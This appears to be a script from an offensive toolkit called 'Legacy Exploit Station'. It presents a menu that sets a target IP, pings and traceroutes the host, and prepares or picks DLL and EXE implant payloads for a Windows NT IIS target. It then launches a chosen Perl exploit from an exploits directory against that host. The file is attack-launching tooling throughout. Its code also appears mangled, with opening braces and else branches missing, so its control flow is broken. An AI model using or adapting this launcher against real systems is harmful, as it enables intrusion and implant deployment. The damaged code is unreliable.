464 lines
12 KiB
464 lines
12 KiB
@include "_Arrays.dsi";
@include "_LpHelperFunctions.dsi";
@include "_Menu.dsi";
@include "_Paths.dsi";
@echo off;
string $logDir;
StrCat($logDir, "/LegacyExploits/");
string $rootDir;
StrCat($rootDir, "..");
string $expDir = "%_sgEnv{'script_path'}/../Exploits";
# setup default params
string %params;
%params{'arch'} = "i386";
%params{'os'} = "winnt";
%params{'iis_root'} = "C:\\inetpub";
%params{'root_dir'} = $rootDir;
%params{'work_dir'} = $logDir;
%params{'full_exploit_dir'} = $expDir;
%params{'lp_dll'} = "Resources/Pc/%params{'arch'}-%params{'os'}/PC_Exploit.dll";
%params{'project'} = "Legacy Exploit Station";
%params{'nopause'} = "true";
%params{'payload_exe_name'} = "**NONE**";
# make sure we have a target IP
if (!_ChangeTargetIp(%params))
return false;
# create menu
string %menu;
if (!_CreateMenu(%menu, %params{'project'}, %params{'hmenu'}) || !defined(%params{'hmenu'}) ||
!_SetHeader(%menu, %params{'hmenu'}, "ExploitHeader" ) ||
!_AddSection(%menu, %params{'hmenu'}, "Configuration", %params{'hsConfig'}) || !defined(%params{'hsConfig'}) ||
!_AddOption(%menu, %params{'hsConfig'}, "Change target IP", "ChangeTargetIp") ||
!_AddOption(%menu, %params{'hsConfig'}, "Change EXE name", "ChangeExeName") ||
!_AddOption(%menu, %params{'hsConfig'}, "Change IIS location", "ChangeIISLocation") ||
!_AddSection(%menu, %params{'hmenu'}, "Payload", %params{'hsPayload'}) || !defined(%params{'hsPayload'}) ||
!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new DLL payload", "PrepDllPayload") ||
!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new EXE payload", "PrepExePayload") ||
!_AddOption(%menu, %params{'hsPayload'}, "Pick an existing payload", "PickPayload") ||
!_AddSection(%menu, %params{'hmenu'}, "Actions", %params{'hsActions'}) || !defined(%params{'hsActions'}) ||
!_AddOption(%menu, %params{'hsActions'}, "Run an exploit", "PerformExploit"))
echo("*** Unable to create %params{'project'} menu ***", ERROR);
return false;
return _ExecuteMenu(%menu, %params{'hmenu'}, %params);
Sub ChangeExeName(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
return _ChangeExeName(%params);
} /* end ChangeExeName */
Sub ChangeTargetIp(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
return _ChangeTargetIp(%params);
} /* end ChangeTargetIp */
Sub ChangeIISLocation(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
string $name;
if (!GetInput("Enter the new IIS location", $name, %params{'iis_root'}) || !defined($name))
return true;
%params{'iis_root'} = $name;
return true;
} /* end ChangeIISLocation */
sub ExploitHeader(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
echo "Current Configuration:";
echo(" Target IP : %params{'targetIP'}", DEFAULT);
echo(" IIS Root : %params{'iis_root'}", DEFAULT);
echo(" LP DLL : %params{'lp_dll'}", DEFAULT);
if (!defined(%params{'payload_dll'}))
echo(" DLL Payload : None", WARNING);
echo(" DLL Payload : %params{'payload_dll_description'}", DEFAULT);
# determine payload file short name
string $shortFile;
RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_dll'}, $shortFile);
echo(" $shortFile[0]/$shortFile[1]", DEFAULT);
if (!defined(%params{'payload_exe'}))
echo(" EXE Payload : None", WARNING);
echo(" EXE Payload : %params{'payload_exe_description'}", DEFAULT);
string $shortFile;
RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_exe'}, $shortFile);
echo(" $shortFile[0]/$shortFile[1]", DEFAULT);
echo(" EXE Name : %params{'payload_exe_name'}", DEFAULT);
return true;
} /* end ExploitHeader */
sub FindExploits(REF string %params)
string $dirs;
if (!FileGetDirs(%params{'full_exploit_dir'}, "*", $dirs))
return false;
for (int $i=0; $i < sizeof($dirs); $i++)
if (FileCheck("$dirs[$i]/disabled"))
string %config;
if (!_ReadExploitConfig($dirs[$i], %config))
if (!defined(%config{'name'}))
string $parts;
if (SplitPath($dirs[$i], $parts))
%config{'name'} = $parts[1];
%config{'name'} = $dirs[$i];
_AppendString(%params{'exploits'}, $dirs[$i]);
_AppendString(%params{'exploit_names'}, %config{'name'});
return true;
} /* end FindExploits */
sub PerformExploit(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
if (!defined(%params{'payload_dll'}) && !defined(%params{'payload_exe'}))
echo("* No payloads set", ERROR);
return true;
string $choice;
int $index;
if (!_ExecuteSimpleMenu("Choose an exploit", %params{'exploit_names'}, $choice, $index) || !defined($choice))
return true;
if (!defined($index) || !defined(%params{'exploits'}[$index]))
echo("* Failed to find directory for $choice", ERROR);
return true;
string %config;
if (!_ReadExploitConfig(%params{'exploits'}[$index], %config))
echo("* Failed to read exploit config", ERROR);
return true;
# fix up the options with our variables
string $options = %config{'options'};
string $parts;
if (!RegExSplit("\\s", %config{'options'}, 0, $parts))
echo("* Failed to split up exploit options", ERROR);
return true;
# set relative exploit dir
string $dirParts;
if (!SplitPath(%params{'exploits'}[$index], $dirParts))
echo("* Failed to split dir parts", ERROR);
return true;
%params{'exploit_dir'} = "\\\"Exploits\\$dirParts[1]\\\"";
string $cmdLine = "perl %config{'command'}";
for (int $i=0; $i < sizeof($parts); $i++)
string $varName;
if (RegExMatch("^\\\$(.*)\$", $parts[$i], $varName))
$parts[$i] = "%params{$varName}";
StrCat($cmdLine, " $parts[$i]");
string $rootDir = "%params{'full_exploit_dir'}/../";
StrCat($cmdLine, " -c $rootDir -v");
@echo on;
if (!`local run -command "$cmdLine" -redirect -directory "%params{'exploits'}[$index]"`)
echo("* Failed to run exploit", ERROR);
return true;
string $name;
if (!RegExMatch("^(.*)\\s+\\(version .*\\).*\$", $choice, $name))
$name = $choice;
_RecordToolUse("$name", $choice);
@echo off;
return true;
} /* end PerformExploit */
sub PickPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3 -verbose";
@record on;
if (!`pc_pick $extraArgs`)
echo("* Failed to pick payload", ERROR);
return true;
@record off;
string $file, $name, $binType;
if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
!GetCmdData("Payload::File", $file) || !defined($file) ||
!GetCmdData("Payload::BinType", $binType) || !defined($binType))
echo("* Failed to get payload information", ERROR);
return true;
if ($binType == "sharedlib")
%params{'payload_dll_description'} = $name;
%params{'payload_dll'} = $file;
%params{'payload_exe_description'} = $name;
%params{'payload_exe'} = $file;
return true;
} /* end PickPayload */
sub PrepDllPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
%params{'loadBinType'} = "sharedlib";
return PrepPayload(%params, %params{'payload_dll_description'}, %params{'payload_dll'});
} /* end PrepDllPayload */
sub PrepExePayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
$cont = true;
%params{'loadBinType'} = "exe";
return PrepPayload(%params, %params{'payload_exe_description'}, %params{'payload_exe'});
} /* end PrepExePayload */
sub PrepPayload(REF string %params, OUT string $payloadName, OUT string $payloadFile)
string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3";
StrCat($extraArgs, " -binType %params{'loadBinType'}");
@record on;
if (!`pc_prep $extraArgs`)
echo("* Failed to configure payload", ERROR);
return true;
@record off;
# assume that they want to pick whatever one they just configured
string $file, $name;
if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
!GetCmdData("Payload::File", $file) || !defined($file))
echo("* Failed to get payload information", ERROR);
return true;
$payloadName = $name;
$payloadFile = $file;
if (%params{'loadBinType'} == "exe")
return true;
} /* end PrepPayload */
Sub _ChangeExeName(REF string %params)
string $name;
if (!GetInput("Enter the new EXE name", $name, %params{'payload_exe_name'}) || !defined($name))
return true;
%params{'payload_exe_name'} = $name;
return true;
} /* end _ChangeExeName */
Sub _ChangeTargetIp(REF string %params)
# get the target IP
while (true)
string $temp;
if (GetInput("Enter the target IP", $temp))
if (RegExMatch("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\$", $temp))
# good ip
%params{'targetIP'} = $temp;
if (prompt("Do you want to ping the target?"))
@echo on;
`ping %params{'targetIP'} -timeout 15s`;
@echo off;
if (!prompt("Do you want to continue?"))
return false;
if (prompt("Do you want to do a traceroute to the target?"))
@echo on;
`traceroute %params{'targetIP'} -icmp -maxhops 30 -timeout 15s`;
@echo off;
if (!prompt("Do you want to continue?"))
return false;
return true;
echo("The value must be of the form ###.###.###.###", ERROR);
# shouldn't get here
return false;
} /* end _ChangeTargetIp */
sub _ReadExploitConfig(IN string $dir, OUT string %config)
string $lines;
if (!ReadFile("$dir/exploit.cfg", $lines))
return false;
for (int $j=0; $j < sizeof($lines); $j++)
string $parts;
if (RegExSplit("=", $lines[$j], 2, $parts) && (sizeof($parts) == 2))
%config{$parts[0]} = $parts[1];
return true;
} /* end _ReadExploitConfig */